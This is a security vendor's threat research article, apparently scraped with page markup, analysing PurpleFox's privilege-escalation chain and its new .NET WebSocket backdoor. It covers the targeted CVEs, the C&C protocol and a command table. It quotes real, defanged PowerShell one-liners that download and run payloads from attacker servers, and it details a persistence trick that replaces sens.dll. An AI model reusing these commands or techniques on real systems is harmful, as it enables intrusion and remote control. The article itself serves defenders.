PurpleFox Adds New Backdoor That Uses WebSockets<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/j\/purplefox-adds-new-backdoor-that-uses-websockets.html\"><br \/>\n<meta property=\"og:title\" content=\"PurpleFox Adds New Backdoor That Uses WebSockets\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox-main.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"PurpleFox Adds New Backdoor That Uses WebSockets\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox-main.jpg\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"51.454484902309\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"1154148854\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"10.79375\">\n<div class=\"article-details\" role=\"heading\" readability=\"41.2125\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Cyber Threats<\/p>\n<p class=\"article-details__description\">In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.<\/p>\n<p class=\"article-details__author-by\">By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy <time class=\"article-details__date\">October 19, 2021<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"47.213541666667\">\n<div readability=\"39.758771929825\">\n<p>In September 2021, the Trend Micro <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response\/managed-xdr-mdr.html\">Managed XDR<\/a> (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.<\/p>\n<p>We also found a new backdoor written in .NET implanted during the intrusion, which we believe is highly associated with PurpleFox. This backdoor, which we call FoxSocket, leverages WebSockets to communicate with its command-and-control (C&C) servers, resulting in a more robust and secure means of communication compared to regular HTTP traffic.<\/p>\n<p>We believe that this particular threat is currently being aimed at users in the Middle East. We first encountered this threat via customers in the region. We are currently investigating if it has been found in other parts of the world.<\/p>\n<p>In this blog, we describe some of the observed modifications for the initial PurpleFox payloads, alongside the new implanted .NET backdoor and the C2 infrastructure serving its functionality.<\/p>\n<p><span class=\"body-subhead-title\"><b>PurpleFox Capabilities and Technical Analysis<\/b><\/span><\/p>\n<p><b><i>PowerShell<\/i><\/b><\/p>\n<p>The activity starts with either of the following PowerShell commands being executed:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">“cmd.exe” \/c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]\/\/103.228.112.246[[:]]17881\/57BC9B7E.Png’);MsiMake hxxp[[:]]\/\/103.228.112.246[[:]]17881\/0CFA042F.Png”<\/span><\/li>\n<li><span class=\"rte-red-bullet\">“cmd.exe” \/c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]\/\/117.187.136.141[:]13405\/57BC9B7E.Png’);MsiMake http[:]\/\/117.187.136.141[:]13405\/0CFA042F.Png”<\/span><\/li>\n<\/ul>\n<p>These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of these located in China:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\">\n<caption>Table 1. Location of PurpleFox servers<\/caption>\n<tbody>\n<tr>\n<td><b>Country<\/b><\/td>\n<td><b>Server count<\/b><\/td>\n<\/tr>\n<tr>\n<td>China<\/td>\n<td>345<\/td>\n<\/tr>\n<tr>\n<td>India<\/td>\n<td>34<\/td>\n<\/tr>\n<tr>\n<td>Brazil<\/td>\n<td>29<\/td>\n<\/tr>\n<tr>\n<td>United States<\/td>\n<td>26<\/td>\n<\/tr>\n<tr>\n<td>Others<\/td>\n<td>113<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.727032734952\">\n<div readability=\"17.125659978881\">\n<p>The fetched payload is a long script consisting of three components:<\/p>\n<ol>\n<li><a href=\"https:\/\/github.com\/Kevin-Robertson\/Tater\/blob\/master\/Tater.ps1\" target=\"_blank\" rel=\"noopener\">Tater<\/a> (Hot Potato \u2013 privilege escalation)<\/li>\n<li><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/master\/CodeExecution\/Invoke-ReflectivePEInjection.ps1\" target=\"_blank\" rel=\"noopener\">PowerSploit<\/a><\/li>\n<li><a href=\"https:\/\/www.virustotal.com\/gui\/file\/5d7c25df48dac73698ae455a3d98ea38c2502edf862a47dc6db9a177147db453\" target=\"_blank\" rel=\"noopener\">Embedded exploit bundle binary<\/a> (privilege escalation)<\/li>\n<\/ol>\n<p>The script targets 64-bit architecture systems. It starts by checking the Windows version and applied hotfixes for the vulnerabilities it is targeting.<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Windows 7\/Windows Server 2008<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">CVE-2020-1054 (KB4556836, KB4556843)<\/span><\/li>\n<li><span class=\"rte-circle-bullet\">CVE-2019-0808 (KB4489878, KB4489885, KB2882822)<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\">Windows 8\/Windows Server 2012<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">CVE-2019-1458 (KB4530702, KB4530730)<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\">Windows 10\/Windows Server 2019<\/span>\n<ul>\n<li><span class=\"rte-circle-bullet\">CVE-2021-1732 (KB4601354, KB4601345, KB4601315, KB4601319)<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command.<\/p>\n<p>The goal is to install the MSI package as an admin without any user interaction.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"50\">\n<div readability=\"45\">\n<p><b><i>MSI Package<\/i><\/b><\/p>\n<p>The MSI package starts by removing the following registry keys, which are old Purple Fox installations if any are present:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">HKLM\\SYSTEM\\CurrentControlSet\\Services\\{ac00-ac10}<\/span><\/li>\n<\/ul>\n<p>It then installs the components (<i>dbcode21mk.log<\/i> and <i>setupact64.log<\/i>) of the Purple Fox backdoor to Windows directory. Afterward, it sets two registry values under the key \u201cHKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\u201d:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">AllowProtectedRenames to 0x1, and<\/span><\/li>\n<li><span class=\"rte-red-bullet\">PendingFileRenameOperations to the following:<\/span><\/li>\n<\/ul>\n<p><span class=\"blockquote\">\\??\\C:\\Windows\\AppPatch\\Acpsens.dll<\/span><\/p>\n<p>\\??\\C:\\Windows\\system32\\sens.dll<br \/>\\??\\C:\\Windows\\AppPatch\\Acpsens.dll<br \/>\\??\\C:\\Windows\\system32\\sens.dll<\/p>\n<p>\\??\\C:\\Windows\\setupact64.log<br \/>\\??\\C:\\Windows\\system32\\sens.dll<\/p>\n<p>These commands move <i>sens.dll<\/i> to <i>C:\\Windows\\AppPatch\\Acpsens.dll<\/i> and replace it with the installed file <i>setupact64.log<\/i>.<\/p>\n<p>The MSI package then runs a .vbs script that creates a Windows firewall rule to block incoming connections on ports 135, 139, and 445. As a final step, the system is restarted to allow PendingFileRenameOperations to take place, replacing <i>sens.dll<\/i>, which will make the malware run as the System Event Notification Service (SENS).<\/p>\n<p><b><i>PurpleFox Backdoor<\/i><\/b><\/p>\n<p>The installed malware is a .dll file protected with VMProtect. Using the other data file installed by the MSI package, it unpacks and manually loads different DLLs for its functionality. It also has a rootkit driver that is also unpacked from the data file and is used to hide its files, registry keys, and processes. The sample starts by copying itself to another file and installing a new service, then restoring the original sens.dll file. Afterward, it loads the driver to hide its files and registries and then spawns and injects a sequence of a 32-bit process to inject its code modules into, as they are 32-bit DLLs.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox01.png\" alt=\"PurpleFox installation process\"><figcaption>Figure 1. PurpleFox installation process<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p><span class=\"body-subhead-title\">WebSocket Backdoor<\/span><\/p>\n<p><b><i>Initial Delivery<\/i><\/b><\/p>\n<p>The initial activity for retrieving this backdoor was captured three days after the previous PurpleFox intrusion attempts on the same compromised server. The Trend Micro Vision One\u2122 platform flagged the following suspicious PowerShell commands:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">“cmd.exe” \/c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]\/\/185.112.144.245\/a\/1’))”<\/span><\/li>\n<li><span class=\"rte-red-bullet\">“cmd.exe” \/c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]\/\/185.112.144.245\/a\/2’))”<\/span><\/li>\n<li><span class=\"rte-red-bullet\">“cmd.exe” \/c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]\/\/185.112.144.245\/a\/3’))”<\/span><\/li>\n<li><span class=\"rte-red-bullet\">“cmd.exe” \/c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]\/\/185.112.144.245\/a\/4’))”<\/span><\/li>\n<li><span class=\"rte-red-bullet\">“cmd.exe” \/c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]\/\/185.112.144.245\/a\/5’))”<\/span><\/li>\n<li><span class=\"rte-red-bullet\">“cmd.exe” \/c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]\/\/185.112.144.245\/a\/8’))”<\/span><\/li>\n<li><span class=\"rte-red-bullet\">“cmd.exe” \/c powershell -c “iex((new-object Net.WebClient).DownloadString(‘hxxp[:]\/\/185.112.144.245\/a\/9’))”<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox02.png\" alt=\"Trend Micro Vision One alert for PowerShell commands\"><figcaption>Figure 2. Trend Micro Vision One alert for PowerShell commands<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>We analyzed the payload hosted on the URLs, which were variations of 185[.]112.144.245\/a\/[1-9], and all were found to be serving two variants of another PowerShell script that acts as the main downloader for the .NET backdoor.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox03.png\" alt=\"Contents of payload\"><figcaption>Figure 3. Contents of payload<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>The difference between the two observed PowerShell scripts were in Base64-encoded data that was passed as an argument to the .NET sample downloaded from <i>185[.]112[.]144[.]45\/a\/data<\/i> and finally invoked with this configuration parameter. We found two different configuration parameters used: We observed the first one on August 26 and the second one with more domains embedded on August 30. The decoded Base64-encoded configuration parameters are shown in the following figures:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox04.png\" alt=\"August 26 configuration\"><figcaption>Figure 4. August 26 configuration<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox05.png\" alt=\"August 30 configuration\"><figcaption>Figure 5. August 30 configuration<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>These configuration parameters will be used by the .NET initialization routines to pick a C&C server and initialize cryptographic functions for the C&C channel. Aside from the configuration, the payload itself is retrieved from <i>185.112.144[.]45\/a\/data<\/i>.<b> <\/b>We also found some old variants that date back to June 22 that have fewer capabilities than the more recent variants.<\/p>\n<p>During the earliest iterations for deploying this backdoor, aligning with the creation data of the malicious domain <i>advb9fyxlf2v[.]com<\/i>, the configuration parameters had a minimal number of subdomains to contact the C&C servers compared to the recent one.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox06.png\" alt=\"Backdoor configuration\"><figcaption>Figure 6. Backdoor configuration<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"15\">\n<p><span class=\"body-subhead-title\">.NET Backdoor Obfuscation<\/span><\/p>\n<p>Let us start the analysis with the backdoor dropped on the SQL server. When decompiled, it will output some obfuscated symbols, although most of these can\u2019t be restored to the original. Merely making them to be human-readable is sufficient for basic static analysis. Sometimes, some of the original names can be restored.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox07.png\" alt=\"Cleaned classes and method names\"><figcaption>Figure 7. Cleaned classes and method names<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>One notable characteristic we rarely see in malware is leveraging WebSocket communication to the C&C servers for an efficient bidirectional channel between the infected client and the server.<\/p>\n<p>WebSocket is a communication technology that supports streams of data to be exchanged between a client and a server over just a single TCP session. This is different from traditional request or response protocols like HTTP. This gives the threat actor a more covert alternative to HTTP requests and responses traffic, which creates an opportunity for a more silent exfiltration with less likelihood of being detected.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox08.png\" alt=\"Traditional (left) and WebSocket techniques (right)\"><figcaption>Figure 8. Traditional (left) and WebSocket techniques (right)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>It initializes a WebSocket communication with its C&C server and keeps it open by sending keepalive messages to maintain the TCP connection. Once this is established, a series of bidirectional messages will be exchanged between the infected machine and the selected C&C server to negotiate a session encryption key.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox09.png\" alt=\"TCP\/IP exchanges between client and server\"><figcaption>Figure 9. TCP\/IP exchanges between client and server<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>The execution starts by initializing the WebSocket and registering four callback functions as handlers for the WebSocket events.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox10.png\" alt=\"Function for registering callback functions\"><figcaption>Figure 10. Function for registering callback functions<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>One of the relevant callbacks is <b>onOpen<\/b>, which will initialize the C&C channel encryption parameters once the WebSocket object is fired for the first time. As shown in the next section, this is mainly for implementing the first Diffie-Hellman (DH) key exchange message with the C&C server. On the other side, the <b>onReceive<\/b> handler will process and dispatch all the commands received from the server after a secure communication channel is established and when the session encryption key is updated.<\/p>\n<p><span class=\"body-subhead-title\">Key Negotiations<\/span><\/p>\n<p>The first key exchange with the C&C server is carried out by the <b>onOpen<\/b> callback registered function, as seen in Figure 11.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox11.png\" alt=\"onOpen function\"><figcaption>Figure 11. onOpen function<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"39\">\n<div readability=\"23\">\n<p>It initializes the EC DH object with some parameters to start the shared secret key negotiation. The <b>ECDiffieHellmanKeyDerivationFunction<\/b> property is then set to <b>Hash.<\/b> This property is for specifying the key derivation function that the <b>ECDiffieHellmanCng<\/b> class will use to convert secret agreements into key material, so a <b>hash algorithm<\/b> is used to generate key material (instead of <b>HMAC<\/b> or <b>TLS<\/b>).<\/p>\n<p>Afterward, the client will try to send the property <b>PublicKey<\/b>, which will be used at the C&C side on another <b>ECDiffieHellmanCng<\/b> object to generate a shared secret agreement. Eventually, this data will be sent on the WebSocket as the first key exchange message. However, instead of sending it in cleartext, the client deploys a symmetric AES encryption for any communication over the WebSocket for the first exchange, as no shared secret is established yet, and the AES encryption will generate a default key for this first exchange. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox12.png\" alt=\"Function and code for the AES encryption key\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox13.png\" alt=\"Function and code for the AES encryption key\"><figcaption>Figures 12-13. Function and code for the AES encryption key<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>This will result in the key negotiation message being encrypted with <b>AES<\/b> using the shown parameters and a dummy key generated <b>(111\u2026.11)[32]<\/b> named <b>byte_0<\/b> in the following debugging session with the actual AES cipher text with a fixed length of <b>176 bytes<\/b>. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox14.png\" alt=\"Structure of key exchange message\"><figcaption>Figure 14. Structure of key exchange message<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>The 176 encrypted bytes are the actual data that will be sent over the WebSocket, which marks the end of the first key exchange message.<\/p>\n<p><span class=\"body-subhead-title\">Second Exchange (C&C to Victim)<\/span><\/p>\n<p>The second key exchange message is sent from the server to the client that will be handled by the <b>onReceive<\/b> function. The execution is invoked by the message handler. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox15.png\" alt=\"Invoking the onReceive function\"><figcaption>Figure 15. Invoking the onReceive function<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>This AES-encrypted second exchange has a fixed length of 304 bytes.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox16.png\" alt=\"Contents of incoming message\"><figcaption>Figure 16. Contents of incoming message<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>It then checks if this incoming message is related to the control plane key establishment or just a normal data command.<\/p>\n<p>If it is related to the former, the first step is to decrypt the symmetric encryption on the C2 channel then finalize the shared secret generation by handing the execution to ECDH derivation function method_7.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox17.png\" alt=\"Handoff to method_7 function\"><figcaption>Figure 17. Handoff to method_7 function<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The client will verify the signed message by loading the RSA public key loaded from the configuration payload shown in the previous section. If the signature is verified correctly, key material will be derived from the DH exchange and will be saved as the permanent symmetric AES encryption key (Symmetric_AES_key variable) that will be used as long as the WebSocket channel is active.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox18.png\" alt=\"method_7 function\"><figcaption>Figure 18. method_7 function<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"40\">\n<div readability=\"25\">\n<p><span class=\"body-subhead-title\">Third Exchange (Victim to C&C)<\/span><\/p>\n<p>Once an efficient encrypted session is established over the WebSocket, the client will fingerprint the machine by extracting specific data (including the username, machine name, local IP, MAC address, and Windows version) and will relay such data over the secure channel to get the victim profiled at the server side, which is the final exchange before the WebSocket channel is fully established. It will then listen for further commands, which will be covered in the next section.<\/p>\n<p>As the fingerprinting data collected will be different from one execution environment to another, this message will vary in length. From our lab analysis, it was 240 bytes with the newly generated shared secret key.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/21\/j\/purplefox-backdoor-uses-websockets\/purplefox19.png\" alt=\"Newly generated secret key\"><figcaption>Figure 19. Newly generated secret key<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"37.5\">\n<div readability=\"20\">\n<p>As far as the WebSocket is maintained with the keepalive messages shown earlier, the operators can signal any command to be executed, so what happens next mainly depends on the targeting and the actual motivation of the operator.<\/p>\n<p><span class=\"body-subhead-title\">WebSocket Commands<\/span><\/p>\n<p>In this section, we cover some of the observed commands sent from the server. There are some minor differences between variants across them with regard to the command numbers and the supported functionality.<\/p>\n<p>All the handling of commands is implemented in the main dispatch routine (except for command 160, which is used for key negotiation or renegotiation).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\">\n<caption>Table 2. List of commands<\/caption>\n<tbody readability=\"22\">\n<tr>\n<td><b>Command code<\/b><\/td>\n<td><b>Functionality<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>20<\/td>\n<td>Sends the current date on the victim machine<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>30<\/td>\n<td>Leaks DriveInfo.GetDrives() results info for all the drives <\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>40<\/td>\n<td>Leaks DirectoryInfo() results info for a specific directory<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>50<\/td>\n<td>FileInfo()results info for a specific file<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>60<\/td>\n<td>Recursive directory search<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>70<\/td>\n<td>Executes WMI queries – ManagementObjectSearcher()<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>80<\/td>\n<td>Closes the WebSocket Session<\/td>\n<\/tr>\n<tr>\n<td>90<\/td>\n<td>Exits the process<\/td>\n<\/tr>\n<tr>\n<td>100<\/td>\n<td>Spawns a new process<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>110<\/td>\n<td>Downloads more data from a specific URL to the victim machine<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>120<\/td>\n<td>DNS lookup from the victim machine<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>130<\/td>\n<td>Leaks specific file contents from the victim machine<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>140<\/td>\n<td>Writes new content to a specific location<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>150<\/td>\n<td>Downloads data then write to a specific file<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>160<\/td>\n<td>Renegotiates session key for symmetric encryption<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>180<\/td>\n<td>Gets current process ID\/Name<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>210<\/td>\n<td>Returns the configuration parameter for the backdoor<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>220<\/td>\n<td>Kills the process then start the new process with a different config<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>230<\/td>\n<td>Kills specific process with PID<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>240<\/td>\n<td>Queries internal backdoor object properties<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>260<\/td>\n<td>Leaks hashes of some specific files requested<\/td>\n<\/tr>\n<tr>\n<td>270<\/td>\n<td>Kills list of PIDs<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>280<\/td>\n<td>Deletes list of files\/directories requested<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>290<\/td>\n<td>Moves list of files\/directories to another location<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>300<\/td>\n<td>Creates new directory to a specific location<\/td>\n<\/tr>\n<\/tbody>\n<\/table><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p><span class=\"body-subhead-title\">WebSocket C&C Infrastructure<\/span><\/p>\n<p>At the time of this writing, there were several active C&C servers controlling the WebSocket clients. By profiling the infected targets and interacting through different commands sent, we listed the observed IP addresses and the registered domains found in the PowerShell downloaders and the backdoor configuration parameters.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\">\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\">\n<caption>Table 3. WebSocket C&C serversIP address Description ASN Notable activity<\/caption>\n<tbody readability=\"4.5\">\n<tr>\n<td><b>IP address <\/b><\/td>\n<td><b>Description <\/b><\/td>\n<td><b>ASN<\/b><\/td>\n<td><b>Notable activity<\/b><\/td>\n<\/tr>\n<tr readability=\"12\">\n<td>185.112.144.245<\/td>\n<td readability=\"9\">\n<p>(Hosting PS payloads, \/a\/[1-9])<\/p>\n<p>(Hosting .Net Payload, \/a\/data)<\/p>\n<\/td>\n<td width=\"146\" valign=\"top\" rowspan=\"10\">\n<p>AS 44925 ( 1984 ehf )<\/p>\n<\/td>\n<td>Iraq, Saudi Arabia, Turkey, UAE<\/td>\n<\/tr>\n<tr>\n<td>185.112.147.50<\/td>\n<td 